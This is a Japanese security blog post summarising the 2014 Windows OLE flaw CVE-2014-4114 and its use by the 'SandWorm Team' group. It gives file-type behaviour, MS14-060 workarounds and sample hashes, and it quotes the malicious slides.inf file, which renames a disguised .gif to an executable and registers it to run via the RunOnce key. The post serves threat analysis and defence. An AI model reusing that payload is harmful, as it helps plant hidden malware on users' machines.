piyolog

piyokangoの備忘録です。セキュリティの出来事を中心にまとめています。このサイトはGoogle Analyticsを利用しています。

Windows OLEの脆弱性(CVE-2014-4114)関連情報をまとめてみた

iSight Partnersが調査を行ったサイバーエスピオナージで未修正のWindows脆弱性が悪用されていたことが判明し、Microsoftとの調整を経て同社は2014年10月14日(現地時間)にこの活動に関する情報を発表しました。ここでは脆弱性、及びそれを悪用する活動に関連する情報をまとめます。

脆弱識別情報

  • CVE-2014-4114

CVE-2014-4114を悪用した攻撃シナリオ

  • Exploit(OLEオブジェクト)が含まれたMicrosoft Officeファイルをダウンロード、またはメール等で受信し、かつ開いた場合に影響を受ける可能性がある。
  • 保護されたビューで開封した場合はリスクを軽減してファイル内容を確認することが可能。
  • 脆弱性が悪用された場合、現在のユーザーと同じユーザー権限となる。
悪用が確認されているPowerPoint関係のファイルについて

CVE-2014-4114が埋め込まれたPowerPointファイルが確認されている。ファイルの種別によって挙動が異なる。

ファイル種別 拡張子 開封時動作 悪用時のUAC表示 報告事例
PowerPointプレゼンテーション .pptx
.ppt
編集モード 表示される 報告無し
PowerPointスライドショー .ppsx
.pps
プレゼンテーションモード 表示されない 報告有り
OLEについて

OLE とは何ですか?
OLE (Object Linking and Embedding) は、複合データを作成および編集する機能など、データや機能をアプリケーションで共有できるようにするテクノロジです。複合データとは、複数の形式の情報が含まれるデータです。たとえば、複合 Microsoft Word 文書には、埋め込み Microsoft Excel スプレッドシート (つまり OLE オブジェクト) が含まれる場合があります。このテクノロジにより、埋め込み先での編集も可能になります。OLE オブジェクトがアクティブにされている際、新たなアプリケーションは起動せず、その代わり、ユーザーがそれまで使用していたアプリケーション内に新たなメニュー アイテムのセットが表示されます。OLE の詳細については、「Compound Documents」(英語情報) を参照してください。

https://technet.microsoft.com/ja-jp/library/security/MS14-060

回避策

  • iSIGHT Partners、Microsoftは以下3つの回避策を紹介している。詳細はMS14-060参照のこと
    • WebClientサービスの無効化
    • TCP 139/445ポートの遮断
    • セットアップ情報ファイル(.inf)経由での実行ファイルの起動抑止

CVE-2014-4114を悪用するサイバーエスピナオージ

組織名称

  • SandWorm Team
    • iSIGHT Partnersが命名
    • iSIGHT Partnersが監視しているロシア系組織5つの内の1つ。
    • 2009年からの活動を確認

iSIGHT Partnersが確認した標的組織

サンプル検体

File Type Hash Sandbox Analysis
spiski_deputatov_done.ppsx Exploit
(CVE-2014-4114)
70b8d220469c8071029795d32ea91829f683e3fbbaa8b978a31a0974daee8aaf Malwr
slide1.exe
(slide1.gif)
Payload 0fda6c118fb7dc946440cb9225e32ab1825d87d4f088bb75a6eab7cef35433bc Malwr
ThreatExpert
slides.inf Payload(.inf) 1dc8e4a5be35f12b26b1ca4340b8f08ad073c67203d05392a4b9e7b9e9635d63 -
Slides.infの内容(一部?)

; 61883.INF
; Copyright (c) Microsoft Corporation. All rights reserved.
 
[Version]
Signature = "$CHICAGO$"
Class=61883
ClassGuid={7EBEFBC0-3200-11d2-B4C2-00A0C9697D17}
Provider=%Msft%
DriverVer=06/21/2006,6.1.7600.16385
 
[DestinationDirs]
DefaultDestDir = 1
 
[DefaultInstall]
RenFiles = RxRename
AddReg = RxStart
 
[RxRename]
slide1.gif.exe, slide1.gif
[RxStart]
HKLM,Software\Microsoft\Windows\CurrentVersion\RunOnce,Install,,%1%\slide1.gif.exe

http://pastebin.com/rfYAdRrF

謝辞

この記事は次の方の情報を元に追記を行っています。

  • @0x009AD6_810さん

更新履歴

  • 2014/10/15 AM 新規作成
  • 2014/10/15 AM サンプルの接続先と思われるIPアドレスを追加
  • 2014/10/15 AM MS14-060関連の情報を追加
  • 2014/10/15 AM 関連リンク追加
  • 2014/10/15 PM infファイルの情報を追加